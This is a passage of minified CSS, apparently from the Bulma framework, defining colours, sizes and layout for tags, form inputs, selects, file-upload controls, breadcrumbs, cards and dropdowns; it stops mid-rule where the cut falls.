.delete{margin-left:.25rem;margin-right:-.375rem}.tag:not(body).is-white{background-color:#fff;color:#0a0a0a}.tag:not(body).is-black{background-color:#0a0a0a;color:#fff}.tag:not(body).is-light{background-color:#f5f5f5;color:#000000b3}.tag:not(body).is-dark{background-color:#363636;color:#fff}.tag:not(body).is-primary{background-color:#00d1b2;color:#fff}.tag:not(body).is-primary.is-light{background-color:#ebfffc;color:#00947e}.tag:not(body).is-link{background-color:#485fc7;color:#fff}.tag:not(body).is-link.is-light{background-color:#eff1fa;color:#3850b7}.tag:not(body).is-info{background-color:#3e8ed0;color:#fff}.tag:not(body).is-info.is-light{background-color:#eff5fb;color:#296fa8}.tag:not(body).is-success{background-color:#48c78e;color:#fff}.tag:not(body).is-success.is-light{background-color:#effaf5;color:#257953}.tag:not(body).is-warning{background-color:#ffe08a;color:#000000b3}.tag:not(body).is-warning.is-light{background-color:#fffaeb;color:#946c00}.tag:not(body).is-danger{background-color:#f14668;color:#fff}.tag:not(body).is-danger.is-light{background-color:#feecf0;color:#cc0f35}.tag:not(body).is-normal{font-size:.75rem}.tag:not(body).is-medium{font-size:1rem}.tag:not(body).is-large{font-size:1.25rem}.tag:not(body) .icon:first-child:not(:last-child){margin-left:-.375em;margin-right:.1875em}.tag:not(body) .icon:last-child:not(:first-child){margin-left:.1875em;margin-right:-.375em}.tag:not(body) .icon:first-child:last-child{margin-left:-.375em;margin-right:-.375em}.tag:not(body).is-delete{margin-left:1px;padding:0;position:relative;width:2em}.tag:not(body).is-delete:before,.tag:not(body).is-delete:after{background-color:currentColor;content:"";display:block;left:50%;position:absolute;top:50%;transform:translate(-50%) translateY(-50%) rotate(45deg);transform-origin:center center}.tag:not(body).is-delete:before{height:1px;width:50%}.tag:not(body).is-delete:after{height:50%;width:1px}.tag:not(body).is-delete:hover,.tag:not(body).is-delete:focus{background-color:#e8e8e8}.tag:not(body).is-delete:active{background-color:#dbdbdb}.tag:not(body).is-rounded{border-radius:9999px}a.tag:hover{text-decoration:underline}.title,.subtitle{word-break:break-word}.title em,.title span,.subtitle em,.subtitle span{font-weight:inherit}.title sub,.subtitle sub,.title sup,.subtitle sup{font-size:.75em}.title .tag,.subtitle .tag{vertical-align:middle}.title{color:#363636;font-size:2rem;font-weight:600;line-height:1.125}.title strong{color:inherit;font-weight:inherit}.title:not(.is-spaced)+.subtitle{margin-top:-1.25rem}.title.is-1{font-size:3rem}.title.is-2{font-size:2.5rem}.title.is-3{font-size:2rem}.title.is-4{font-size:1.5rem}.title.is-5{font-size:1.25rem}.title.is-6{font-size:1rem}.title.is-7{font-size:.75rem}.subtitle{color:#4a4a4a;font-size:1.25rem;font-weight:400;line-height:1.25}.subtitle strong{color:#363636;font-weight:600}.subtitle:not(.is-spaced)+.title{margin-top:-1.25rem}.subtitle.is-1{font-size:3rem}.subtitle.is-2{font-size:2.5rem}.subtitle.is-3{font-size:2rem}.subtitle.is-4{font-size:1.5rem}.subtitle.is-5{font-size:1.25rem}.subtitle.is-6{font-size:1rem}.subtitle.is-7{font-size:.75rem}.heading{display:block;font-size:11px;letter-spacing:1px;margin-bottom:5px;text-transform:uppercase}.number{align-items:center;background-color:#f5f5f5;border-radius:9999px;display:inline-flex;font-size:1.25rem;height:2em;justify-content:center;margin-right:1.5rem;min-width:2.5em;padding:.25rem .5rem;text-align:center;vertical-align:top}.input,.textarea,.select select{background-color:#fff;border-color:#dbdbdb;border-radius:4px;color:#363636}.input::-moz-placeholder,.textarea::-moz-placeholder,.select select::-moz-placeholder{color:#3636364d}.input::-webkit-input-placeholder,.textarea::-webkit-input-placeholder,.select select::-webkit-input-placeholder{color:#3636364d}.input:-moz-placeholder,.textarea:-moz-placeholder,.select select:-moz-placeholder{color:#3636364d}.input:-ms-input-placeholder,.textarea:-ms-input-placeholder,.select select:-ms-input-placeholder{color:#3636364d}.input:hover,.textarea:hover,.select select:hover,.is-hovered.input,.is-hovered.textarea,.select select.is-hovered{border-color:#b5b5b5}.input:focus,.textarea:focus,.select select:focus,.is-focused.input,.is-focused.textarea,.select select.is-focused,.input:active,.textarea:active,.select select:active,.is-active.input,.is-active.textarea,.select select.is-active{border-color:#485fc7;box-shadow:0 0 0 .125em #485fc740}.input[disabled],.textarea[disabled],.select select[disabled],fieldset[disabled] .input,fieldset[disabled] .textarea,fieldset[disabled] .select select,.select fieldset[disabled] select{background-color:#f5f5f5;border-color:#f5f5f5;box-shadow:none;color:#7a7a7a}.input[disabled]::-moz-placeholder,.textarea[disabled]::-moz-placeholder,.select select[disabled]::-moz-placeholder,fieldset[disabled] .input::-moz-placeholder,fieldset[disabled] .textarea::-moz-placeholder,fieldset[disabled] .select select::-moz-placeholder,.select fieldset[disabled] select::-moz-placeholder{color:#7a7a7a4d}.input[disabled]::-webkit-input-placeholder,.textarea[disabled]::-webkit-input-placeholder,.select select[disabled]::-webkit-input-placeholder,fieldset[disabled] .input::-webkit-input-placeholder,fieldset[disabled] .textarea::-webkit-input-placeholder,fieldset[disabled] .select select::-webkit-input-placeholder,.select fieldset[disabled] select::-webkit-input-placeholder{color:#7a7a7a4d}.input[disabled]:-moz-placeholder,.textarea[disabled]:-moz-placeholder,.select select[disabled]:-moz-placeholder,fieldset[disabled] .input:-moz-placeholder,fieldset[disabled] .textarea:-moz-placeholder,fieldset[disabled] .select select:-moz-placeholder,.select fieldset[disabled] select:-moz-placeholder{color:#7a7a7a4d}.input[disabled]:-ms-input-placeholder,.textarea[disabled]:-ms-input-placeholder,.select select[disabled]:-ms-input-placeholder,fieldset[disabled] .input:-ms-input-placeholder,fieldset[disabled] .textarea:-ms-input-placeholder,fieldset[disabled] .select select:-ms-input-placeholder,.select fieldset[disabled] select:-ms-input-placeholder{color:#7a7a7a4d}.input,.textarea{box-shadow:inset 0 .0625em .125em #0a0a0a0d;max-width:100%;width:100%}.input[readonly],.textarea[readonly]{box-shadow:none}.is-white.input,.is-white.textarea{border-color:#fff}.is-white.input:focus,.is-white.textarea:focus,.is-white.is-focused.input,.is-white.is-focused.textarea,.is-white.input:active,.is-white.textarea:active,.is-white.is-active.input,.is-white.is-active.textarea{box-shadow:0 0 0 .125em #ffffff40}.is-black.input,.is-black.textarea{border-color:#0a0a0a}.is-black.input:focus,.is-black.textarea:focus,.is-black.is-focused.input,.is-black.is-focused.textarea,.is-black.input:active,.is-black.textarea:active,.is-black.is-active.input,.is-black.is-active.textarea{box-shadow:0 0 0 .125em #0a0a0a40}.is-light.input,.is-light.textarea{border-color:#f5f5f5}.is-light.input:focus,.is-light.textarea:focus,.is-light.is-focused.input,.is-light.is-focused.textarea,.is-light.input:active,.is-light.textarea:active,.is-light.is-active.input,.is-light.is-active.textarea{box-shadow:0 0 0 .125em #f5f5f540}.is-dark.input,.is-dark.textarea{border-color:#363636}.is-dark.input:focus,.is-dark.textarea:focus,.is-dark.is-focused.input,.is-dark.is-focused.textarea,.is-dark.input:active,.is-dark.textarea:active,.is-dark.is-active.input,.is-dark.is-active.textarea{box-shadow:0 0 0 .125em #36363640}.is-primary.input,.is-primary.textarea{border-color:#00d1b2}.is-primary.input:focus,.is-primary.textarea:focus,.is-primary.is-focused.input,.is-primary.is-focused.textarea,.is-primary.input:active,.is-primary.textarea:active,.is-primary.is-active.input,.is-primary.is-active.textarea{box-shadow:0 0 0 .125em #00d1b240}.is-link.input,.is-link.textarea{border-color:#485fc7}.is-link.input:focus,.is-link.textarea:focus,.is-link.is-focused.input,.is-link.is-focused.textarea,.is-link.input:active,.is-link.textarea:active,.is-link.is-active.input,.is-link.is-active.textarea{box-shadow:0 0 0 .125em #485fc740}.is-info.input,.is-info.textarea{border-color:#3e8ed0}.is-info.input:focus,.is-info.textarea:focus,.is-info.is-focused.input,.is-info.is-focused.textarea,.is-info.input:active,.is-info.textarea:active,.is-info.is-active.input,.is-info.is-active.textarea{box-shadow:0 0 0 .125em #3e8ed040}.is-success.input,.is-success.textarea{border-color:#48c78e}.is-success.input:focus,.is-success.textarea:focus,.is-success.is-focused.input,.is-success.is-focused.textarea,.is-success.input:active,.is-success.textarea:active,.is-success.is-active.input,.is-success.is-active.textarea{box-shadow:0 0 0 .125em #48c78e40}.is-warning.input,.is-warning.textarea{border-color:#ffe08a}.is-warning.input:focus,.is-warning.textarea:focus,.is-warning.is-focused.input,.is-warning.is-focused.textarea,.is-warning.input:active,.is-warning.textarea:active,.is-warning.is-active.input,.is-warning.is-active.textarea{box-shadow:0 0 0 .125em #ffe08a40}.is-danger.input,.is-danger.textarea{border-color:#f14668}.is-danger.input:focus,.is-danger.textarea:focus,.is-danger.is-focused.input,.is-danger.is-focused.textarea,.is-danger.input:active,.is-danger.textarea:active,.is-danger.is-active.input,.is-danger.is-active.textarea{box-shadow:0 0 0 .125em #f1466840}.is-small.input,.is-small.textarea{border-radius:2px;font-size:.75rem}.is-medium.input,.is-medium.textarea{font-size:1.25rem}.is-large.input,.is-large.textarea{font-size:1.5rem}.is-fullwidth.input,.is-fullwidth.textarea{display:block;width:100%}.is-inline.input,.is-inline.textarea{display:inline;width:auto}.input.is-rounded{border-radius:9999px;padding-left:calc(1.125em - 1px);padding-right:calc(1.125em - 1px)}.input.is-static{background-color:transparent;border-color:transparent;box-shadow:none;padding-left:0;padding-right:0}.textarea{display:block;max-width:100%;min-width:100%;padding:calc(.75em - 1px);resize:vertical}.textarea:not([rows]){max-height:40em;min-height:8em}.textarea[rows]{height:initial}.textarea.has-fixed-size{resize:none}.checkbox,.radio{cursor:pointer;display:inline-block;line-height:1.25;position:relative}.checkbox input,.radio input{cursor:pointer}.checkbox:hover,.radio:hover{color:#363636}.checkbox[disabled],.radio[disabled],fieldset[disabled] .checkbox,fieldset[disabled] .radio,.checkbox input[disabled],.radio input[disabled]{color:#7a7a7a;cursor:not-allowed}.radio+.radio{margin-left:.5em}.select{display:inline-block;max-width:100%;position:relative;vertical-align:top}.select:not(.is-multiple){height:2.5em}.select:not(.is-multiple):not(.is-loading):after{border-color:#485fc7;right:1.125em;z-index:4}.select.is-rounded select{border-radius:9999px;padding-left:1em}.select select{cursor:pointer;display:block;font-size:1em;max-width:100%;outline:none}.select select::-ms-expand{display:none}.select select[disabled]:hover,fieldset[disabled] .select select:hover{border-color:#f5f5f5}.select select:not([multiple]){padding-right:2.5em}.select select[multiple]{height:auto;padding:0}.select select[multiple] option{padding:.5em 1em}.select:not(.is-multiple):not(.is-loading):hover:after{border-color:#363636}.select.is-white:not(:hover):after{border-color:#fff}.select.is-white select{border-color:#fff}.select.is-white select:hover,.select.is-white select.is-hovered{border-color:#f2f2f2}.select.is-white select:focus,.select.is-white select.is-focused,.select.is-white select:active,.select.is-white select.is-active{box-shadow:0 0 0 .125em #ffffff40}.select.is-black:not(:hover):after{border-color:#0a0a0a}.select.is-black select{border-color:#0a0a0a}.select.is-black select:hover,.select.is-black select.is-hovered{border-color:#000}.select.is-black select:focus,.select.is-black select.is-focused,.select.is-black select:active,.select.is-black select.is-active{box-shadow:0 0 0 .125em #0a0a0a40}.select.is-light:not(:hover):after{border-color:#f5f5f5}.select.is-light select{border-color:#f5f5f5}.select.is-light select:hover,.select.is-light select.is-hovered{border-color:#e8e8e8}.select.is-light select:focus,.select.is-light select.is-focused,.select.is-light select:active,.select.is-light select.is-active{box-shadow:0 0 0 .125em #f5f5f540}.select.is-dark:not(:hover):after{border-color:#363636}.select.is-dark select{border-color:#363636}.select.is-dark select:hover,.select.is-dark select.is-hovered{border-color:#292929}.select.is-dark select:focus,.select.is-dark select.is-focused,.select.is-dark select:active,.select.is-dark select.is-active{box-shadow:0 0 0 .125em #36363640}.select.is-primary:not(:hover):after{border-color:#00d1b2}.select.is-primary select{border-color:#00d1b2}.select.is-primary select:hover,.select.is-primary select.is-hovered{border-color:#00b89c}.select.is-primary select:focus,.select.is-primary select.is-focused,.select.is-primary select:active,.select.is-primary select.is-active{box-shadow:0 0 0 .125em #00d1b240}.select.is-link:not(:hover):after{border-color:#485fc7}.select.is-link select{border-color:#485fc7}.select.is-link select:hover,.select.is-link select.is-hovered{border-color:#3a51bb}.select.is-link select:focus,.select.is-link select.is-focused,.select.is-link select:active,.select.is-link select.is-active{box-shadow:0 0 0 .125em #485fc740}.select.is-info:not(:hover):after{border-color:#3e8ed0}.select.is-info select{border-color:#3e8ed0}.select.is-info select:hover,.select.is-info select.is-hovered{border-color:#3082c5}.select.is-info select:focus,.select.is-info select.is-focused,.select.is-info select:active,.select.is-info select.is-active{box-shadow:0 0 0 .125em #3e8ed040}.select.is-success:not(:hover):after{border-color:#48c78e}.select.is-success select{border-color:#48c78e}.select.is-success select:hover,.select.is-success select.is-hovered{border-color:#3abb81}.select.is-success select:focus,.select.is-success select.is-focused,.select.is-success select:active,.select.is-success select.is-active{box-shadow:0 0 0 .125em #48c78e40}.select.is-warning:not(:hover):after{border-color:#ffe08a}.select.is-warning select{border-color:#ffe08a}.select.is-warning select:hover,.select.is-warning select.is-hovered{border-color:#ffd970}.select.is-warning select:focus,.select.is-warning select.is-focused,.select.is-warning select:active,.select.is-warning select.is-active{box-shadow:0 0 0 .125em #ffe08a40}.select.is-danger:not(:hover):after{border-color:#f14668}.select.is-danger select{border-color:#f14668}.select.is-danger select:hover,.select.is-danger select.is-hovered{border-color:#ef2e55}.select.is-danger select:focus,.select.is-danger select.is-focused,.select.is-danger select:active,.select.is-danger select.is-active{box-shadow:0 0 0 .125em #f1466840}.select.is-small{border-radius:2px;font-size:.75rem}.select.is-medium{font-size:1.25rem}.select.is-large{font-size:1.5rem}.select.is-disabled:after{border-color:#7a7a7a!important;opacity:.5}.select.is-fullwidth,.select.is-fullwidth select{width:100%}.select.is-loading:after{margin-top:0;position:absolute;right:.625em;top:.625em;transform:none}.select.is-loading.is-small:after{font-size:.75rem}.select.is-loading.is-medium:after{font-size:1.25rem}.select.is-loading.is-large:after{font-size:1.5rem}.file{align-items:stretch;display:flex;justify-content:flex-start;position:relative}.file.is-white .file-cta{background-color:#fff;border-color:transparent;color:#0a0a0a}.file.is-white:hover .file-cta,.file.is-white.is-hovered .file-cta{background-color:#f9f9f9;border-color:transparent;color:#0a0a0a}.file.is-white:focus .file-cta,.file.is-white.is-focused .file-cta{border-color:transparent;box-shadow:0 0 .5em #ffffff40;color:#0a0a0a}.file.is-white:active .file-cta,.file.is-white.is-active .file-cta{background-color:#f2f2f2;border-color:transparent;color:#0a0a0a}.file.is-black .file-cta{background-color:#0a0a0a;border-color:transparent;color:#fff}.file.is-black:hover .file-cta,.file.is-black.is-hovered .file-cta{background-color:#040404;border-color:transparent;color:#fff}.file.is-black:focus .file-cta,.file.is-black.is-focused .file-cta{border-color:transparent;box-shadow:0 0 .5em #0a0a0a40;color:#fff}.file.is-black:active .file-cta,.file.is-black.is-active .file-cta{background-color:#000;border-color:transparent;color:#fff}.file.is-light .file-cta{background-color:#f5f5f5;border-color:transparent;color:#000000b3}.file.is-light:hover .file-cta,.file.is-light.is-hovered .file-cta{background-color:#eee;border-color:transparent;color:#000000b3}.file.is-light:focus .file-cta,.file.is-light.is-focused .file-cta{border-color:transparent;box-shadow:0 0 .5em #f5f5f540;color:#000000b3}.file.is-light:active .file-cta,.file.is-light.is-active .file-cta{background-color:#e8e8e8;border-color:transparent;color:#000000b3}.file.is-dark .file-cta{background-color:#363636;border-color:transparent;color:#fff}.file.is-dark:hover .file-cta,.file.is-dark.is-hovered .file-cta{background-color:#2f2f2f;border-color:transparent;color:#fff}.file.is-dark:focus .file-cta,.file.is-dark.is-focused .file-cta{border-color:transparent;box-shadow:0 0 .5em #36363640;color:#fff}.file.is-dark:active .file-cta,.file.is-dark.is-active .file-cta{background-color:#292929;border-color:transparent;color:#fff}.file.is-primary .file-cta{background-color:#00d1b2;border-color:transparent;color:#fff}.file.is-primary:hover .file-cta,.file.is-primary.is-hovered .file-cta{background-color:#00c4a7;border-color:transparent;color:#fff}.file.is-primary:focus .file-cta,.file.is-primary.is-focused .file-cta{border-color:transparent;box-shadow:0 0 .5em #00d1b240;color:#fff}.file.is-primary:active .file-cta,.file.is-primary.is-active .file-cta{background-color:#00b89c;border-color:transparent;color:#fff}.file.is-link .file-cta{background-color:#485fc7;border-color:transparent;color:#fff}.file.is-link:hover .file-cta,.file.is-link.is-hovered .file-cta{background-color:#3e56c4;border-color:transparent;color:#fff}.file.is-link:focus .file-cta,.file.is-link.is-focused .file-cta{border-color:transparent;box-shadow:0 0 .5em #485fc740;color:#fff}.file.is-link:active .file-cta,.file.is-link.is-active .file-cta{background-color:#3a51bb;border-color:transparent;color:#fff}.file.is-info .file-cta{background-color:#3e8ed0;border-color:transparent;color:#fff}.file.is-info:hover .file-cta,.file.is-info.is-hovered .file-cta{background-color:#3488ce;border-color:transparent;color:#fff}.file.is-info:focus .file-cta,.file.is-info.is-focused .file-cta{border-color:transparent;box-shadow:0 0 .5em #3e8ed040;color:#fff}.file.is-info:active .file-cta,.file.is-info.is-active .file-cta{background-color:#3082c5;border-color:transparent;color:#fff}.file.is-success .file-cta{background-color:#48c78e;border-color:transparent;color:#fff}.file.is-success:hover .file-cta,.file.is-success.is-hovered .file-cta{background-color:#3ec487;border-color:transparent;color:#fff}.file.is-success:focus .file-cta,.file.is-success.is-focused .file-cta{border-color:transparent;box-shadow:0 0 .5em #48c78e40;color:#fff}.file.is-success:active .file-cta,.file.is-success.is-active .file-cta{background-color:#3abb81;border-color:transparent;color:#fff}.file.is-warning .file-cta{background-color:#ffe08a;border-color:transparent;color:#000000b3}.file.is-warning:hover .file-cta,.file.is-warning.is-hovered .file-cta{background-color:#ffdc7d;border-color:transparent;color:#000000b3}.file.is-warning:focus .file-cta,.file.is-warning.is-focused .file-cta{border-color:transparent;box-shadow:0 0 .5em #ffe08a40;color:#000000b3}.file.is-warning:active .file-cta,.file.is-warning.is-active .file-cta{background-color:#ffd970;border-color:transparent;color:#000000b3}.file.is-danger .file-cta{background-color:#f14668;border-color:transparent;color:#fff}.file.is-danger:hover .file-cta,.file.is-danger.is-hovered .file-cta{background-color:#f03a5f;border-color:transparent;color:#fff}.file.is-danger:focus .file-cta,.file.is-danger.is-focused .file-cta{border-color:transparent;box-shadow:0 0 .5em #f1466840;color:#fff}.file.is-danger:active .file-cta,.file.is-danger.is-active .file-cta{background-color:#ef2e55;border-color:transparent;color:#fff}.file.is-small{font-size:.75rem}.file.is-normal{font-size:1rem}.file.is-medium{font-size:1.25rem}.file.is-medium .file-icon .fa{font-size:21px}.file.is-large{font-size:1.5rem}.file.is-large .file-icon .fa{font-size:28px}.file.has-name .file-cta{border-bottom-right-radius:0;border-top-right-radius:0}.file.has-name .file-name{border-bottom-left-radius:0;border-top-left-radius:0}.file.has-name.is-empty .file-cta{border-radius:4px}.file.has-name.is-empty .file-name{display:none}.file.is-boxed .file-label{flex-direction:column}.file.is-boxed .file-cta{flex-direction:column;height:auto;padding:1em 3em}.file.is-boxed .file-name{border-width:0 1px 1px}.file.is-boxed .file-icon{height:1.5em;width:1.5em}.file.is-boxed .file-icon .fa{font-size:21px}.file.is-boxed.is-small .file-icon .fa{font-size:14px}.file.is-boxed.is-medium .file-icon .fa{font-size:28px}.file.is-boxed.is-large .file-icon .fa{font-size:35px}.file.is-boxed.has-name .file-cta{border-radius:4px 4px 0 0}.file.is-boxed.has-name .file-name{border-radius:0 0 4px 4px;border-width:0 1px 1px}.file.is-centered{justify-content:center}.file.is-fullwidth .file-label{width:100%}.file.is-fullwidth .file-name{flex-grow:1;max-width:none}.file.is-right{justify-content:flex-end}.file.is-right .file-cta{border-radius:0 4px 4px 0}.file.is-right .file-name{border-radius:4px 0 0 4px;border-width:1px 0 1px 1px;order:-1}.file-label{align-items:stretch;display:flex;cursor:pointer;justify-content:flex-start;overflow:hidden;position:relative}.file-label:hover .file-cta{background-color:#eee;color:#363636}.file-label:hover .file-name{border-color:#d5d5d5}.file-label:active .file-cta{background-color:#e8e8e8;color:#363636}.file-label:active .file-name{border-color:#cfcfcf}.file-input{height:100%;left:0;opacity:0;outline:none;position:absolute;top:0;width:100%}.file-cta,.file-name{border-color:#dbdbdb;border-radius:4px;font-size:1em;padding-left:1em;padding-right:1em;white-space:nowrap}.file-cta{background-color:#f5f5f5;color:#4a4a4a}.file-name{border-color:#dbdbdb;border-style:solid;border-width:1px 1px 1px 0;display:block;max-width:16em;overflow:hidden;text-align:inherit;text-overflow:ellipsis}.file-icon{align-items:center;display:flex;height:1em;justify-content:center;margin-right:.5em;width:1em}.file-icon .fa{font-size:14px}.label{color:#363636;display:block;font-size:1rem;font-weight:700}.label:not(:last-child){margin-bottom:.5em}.label.is-small{font-size:.75rem}.label.is-medium{font-size:1.25rem}.label.is-large{font-size:1.5rem}.help{display:block;font-size:.75rem;margin-top:.25rem}.help.is-white{color:#fff}.help.is-black{color:#0a0a0a}.help.is-light{color:#f5f5f5}.help.is-dark{color:#363636}.help.is-primary{color:#00d1b2}.help.is-link{color:#485fc7}.help.is-info{color:#3e8ed0}.help.is-success{color:#48c78e}.help.is-warning{color:#ffe08a}.help.is-danger{color:#f14668}.field:not(:last-child){margin-bottom:.75rem}.field.has-addons{display:flex;justify-content:flex-start}.field.has-addons .control:not(:last-child){margin-right:-1px}.field.has-addons .control:not(:first-child):not(:last-child) .button,.field.has-addons .control:not(:first-child):not(:last-child) .input,.field.has-addons .control:not(:first-child):not(:last-child) .select select{border-radius:0}.field.has-addons .control:first-child:not(:only-child) .button,.field.has-addons .control:first-child:not(:only-child) .input,.field.has-addons .control:first-child:not(:only-child) .select select{border-bottom-right-radius:0;border-top-right-radius:0}.field.has-addons .control:last-child:not(:only-child) .button,.field.has-addons .control:last-child:not(:only-child) .input,.field.has-addons .control:last-child:not(:only-child) .select select{border-bottom-left-radius:0;border-top-left-radius:0}.field.has-addons .control .button:not([disabled]):hover,.field.has-addons .control .button:not([disabled]).is-hovered,.field.has-addons .control .input:not([disabled]):hover,.field.has-addons .control .input:not([disabled]).is-hovered,.field.has-addons .control .select select:not([disabled]):hover,.field.has-addons .control .select select:not([disabled]).is-hovered{z-index:2}.field.has-addons .control .button:not([disabled]):focus,.field.has-addons .control .button:not([disabled]).is-focused,.field.has-addons .control .button:not([disabled]):active,.field.has-addons .control .button:not([disabled]).is-active,.field.has-addons .control .input:not([disabled]):focus,.field.has-addons .control .input:not([disabled]).is-focused,.field.has-addons .control .input:not([disabled]):active,.field.has-addons .control .input:not([disabled]).is-active,.field.has-addons .control .select select:not([disabled]):focus,.field.has-addons .control .select select:not([disabled]).is-focused,.field.has-addons .control .select select:not([disabled]):active,.field.has-addons .control .select select:not([disabled]).is-active{z-index:3}.field.has-addons .control .button:not([disabled]):focus:hover,.field.has-addons .control .button:not([disabled]).is-focused:hover,.field.has-addons .control .button:not([disabled]):active:hover,.field.has-addons .control .button:not([disabled]).is-active:hover,.field.has-addons .control .input:not([disabled]):focus:hover,.field.has-addons .control .input:not([disabled]).is-focused:hover,.field.has-addons .control .input:not([disabled]):active:hover,.field.has-addons .control .input:not([disabled]).is-active:hover,.field.has-addons .control .select select:not([disabled]):focus:hover,.field.has-addons .control .select select:not([disabled]).is-focused:hover,.field.has-addons .control .select select:not([disabled]):active:hover,.field.has-addons .control .select select:not([disabled]).is-active:hover{z-index:4}.field.has-addons .control.is-expanded{flex-grow:1;flex-shrink:1}.field.has-addons.has-addons-centered{justify-content:center}.field.has-addons.has-addons-right{justify-content:flex-end}.field.has-addons.has-addons-fullwidth .control{flex-grow:1;flex-shrink:0}.field.is-grouped{display:flex;justify-content:flex-start}.field.is-grouped>.control{flex-shrink:0}.field.is-grouped>.control:not(:last-child){margin-bottom:0;margin-right:.75rem}.field.is-grouped>.control.is-expanded{flex-grow:1;flex-shrink:1}.field.is-grouped.is-grouped-centered{justify-content:center}.field.is-grouped.is-grouped-right{justify-content:flex-end}.field.is-grouped.is-grouped-multiline{flex-wrap:wrap}.field.is-grouped.is-grouped-multiline>.control:last-child,.field.is-grouped.is-grouped-multiline>.control:not(:last-child){margin-bottom:.75rem}.field.is-grouped.is-grouped-multiline:last-child{margin-bottom:-.75rem}.field.is-grouped.is-grouped-multiline:not(:last-child){margin-bottom:0}@media screen and (min-width: 769px),print{.field.is-horizontal{display:flex}}.field-label .label{font-size:inherit}@media screen and (max-width: 768px){.field-label{margin-bottom:.5rem}}@media screen and (min-width: 769px),print{.field-label{flex-basis:0;flex-grow:1;flex-shrink:0;margin-right:1.5rem;text-align:right}.field-label.is-small{font-size:.75rem;padding-top:.375em}.field-label.is-normal{padding-top:.375em}.field-label.is-medium{font-size:1.25rem;padding-top:.375em}.field-label.is-large{font-size:1.5rem;padding-top:.375em}}.field-body .field .field{margin-bottom:0}@media screen and (min-width: 769px),print{.field-body{display:flex;flex-basis:0;flex-grow:5;flex-shrink:1}.field-body .field{margin-bottom:0}.field-body>.field{flex-shrink:1}.field-body>.field:not(.is-narrow){flex-grow:1}.field-body>.field:not(:last-child){margin-right:.75rem}}.control{box-sizing:border-box;clear:both;font-size:1rem;position:relative;text-align:inherit}.control.has-icons-left .input:focus~.icon,.control.has-icons-left .select:focus~.icon,.control.has-icons-right .input:focus~.icon,.control.has-icons-right .select:focus~.icon{color:#4a4a4a}.control.has-icons-left .input.is-small~.icon,.control.has-icons-left .select.is-small~.icon,.control.has-icons-right .input.is-small~.icon,.control.has-icons-right .select.is-small~.icon{font-size:.75rem}.control.has-icons-left .input.is-medium~.icon,.control.has-icons-left .select.is-medium~.icon,.control.has-icons-right .input.is-medium~.icon,.control.has-icons-right .select.is-medium~.icon{font-size:1.25rem}.control.has-icons-left .input.is-large~.icon,.control.has-icons-left .select.is-large~.icon,.control.has-icons-right .input.is-large~.icon,.control.has-icons-right .select.is-large~.icon{font-size:1.5rem}.control.has-icons-left .icon,.control.has-icons-right .icon{color:#dbdbdb;height:2.5em;pointer-events:none;position:absolute;top:0;width:2.5em;z-index:4}.control.has-icons-left .input,.control.has-icons-left .select select{padding-left:2.5em}.control.has-icons-left .icon.is-left{left:0}.control.has-icons-right .input,.control.has-icons-right .select select{padding-right:2.5em}.control.has-icons-right .icon.is-right{right:0}.control.is-loading:after{position:absolute!important;right:.625em;top:.625em;z-index:4}.control.is-loading.is-small:after{font-size:.75rem}.control.is-loading.is-medium:after{font-size:1.25rem}.control.is-loading.is-large:after{font-size:1.5rem}.breadcrumb{font-size:1rem;white-space:nowrap}.breadcrumb a{align-items:center;color:#485fc7;display:flex;justify-content:center;padding:0 .75em}.breadcrumb a:hover{color:#363636}.breadcrumb li{align-items:center;display:flex}.breadcrumb li:first-child a{padding-left:0}.breadcrumb li.is-active a{color:#363636;cursor:default;pointer-events:none}.breadcrumb li+li:before{color:#b5b5b5;content:"/"}.breadcrumb ul,.breadcrumb ol{align-items:flex-start;display:flex;flex-wrap:wrap;justify-content:flex-start}.breadcrumb .icon:first-child{margin-right:.5em}.breadcrumb .icon:last-child{margin-left:.5em}.breadcrumb.is-centered ol,.breadcrumb.is-centered ul{justify-content:center}.breadcrumb.is-right ol,.breadcrumb.is-right ul{justify-content:flex-end}.breadcrumb.is-small{font-size:.75rem}.breadcrumb.is-medium{font-size:1.25rem}.breadcrumb.is-large{font-size:1.5rem}.breadcrumb.has-arrow-separator li+li:before{content:"→"}.breadcrumb.has-bullet-separator li+li:before{content:"•"}.breadcrumb.has-dot-separator li+li:before{content:"·"}.breadcrumb.has-succeeds-separator li+li:before{content:"≻"}.card{background-color:#fff;border-radius:.25rem;box-shadow:0 .5em 1em -.125em #0a0a0a1a,0 0 0 1px #0a0a0a05;color:#4a4a4a;max-width:100%;position:relative}.card-header:first-child,.card-content:first-child,.card-footer:first-child{border-top-left-radius:.25rem;border-top-right-radius:.25rem}.card-header:last-child,.card-content:last-child,.card-footer:last-child{border-bottom-left-radius:.25rem;border-bottom-right-radius:.25rem}.card-header{background-color:transparent;align-items:stretch;box-shadow:0 .125em .25em #0a0a0a1a;display:flex}.card-header-title{align-items:center;color:#363636;display:flex;flex-grow:1;font-weight:700;padding:.75rem 1rem}.card-header-title.is-centered{justify-content:center}.card-header-icon{-moz-appearance:none;-webkit-appearance:none;appearance:none;background:none;border:none;color:currentColor;font-family:inherit;font-size:1em;margin:0;padding:0;align-items:center;cursor:pointer;display:flex;justify-content:center;padding:.75rem 1rem}.card-image{display:block;position:relative}.card-image:first-child img{border-top-left-radius:.25rem;border-top-right-radius:.25rem}.card-image:last-child img{border-bottom-left-radius:.25rem;border-bottom-right-radius:.25rem}.card-content{background-color:transparent;padding:1.5rem}.card-footer{background-color:transparent;border-top:1px solid #ededed;align-items:stretch;display:flex}.card-footer-item{align-items:center;display:flex;flex-basis:0;flex-grow:1;flex-shrink:0;justify-content:center;padding:.75rem}.card-footer-item:not(:last-child){border-right:1px solid #ededed}.card .media:not(:last-child){margin-bottom:1.5rem}.dropdown{display:inline-flex;position:relative;vertical-align:top}.dropdown.is-active .dropdown-menu,.dropdown.is-hoverable:hover .dropdown-menu{display:block}.dropdown.is-right .dropdown-menu{left:auto;right:0}.dropdown.is-up .dropdown-menu{bottom:100%;padding-bottom:4px;padding-top:initial;top:auto}.dropdown-menu{display:none;left:0;min-width:12rem;padding-top:4px;position:absolute;top:100%;z-index:20}.dropdown-content{background-color:#fff;border-radius:4px;box-shadow:0 .5em 1em -.125em #0a0a0a1a,0 0 0 1px #0a0a0a05;padding-bottom:.5rem;padding-top:.5rem}.dropdown-item{color:#4a4a4a;display:block;font-size:.875rem;line-height:1.5;padding:.375rem 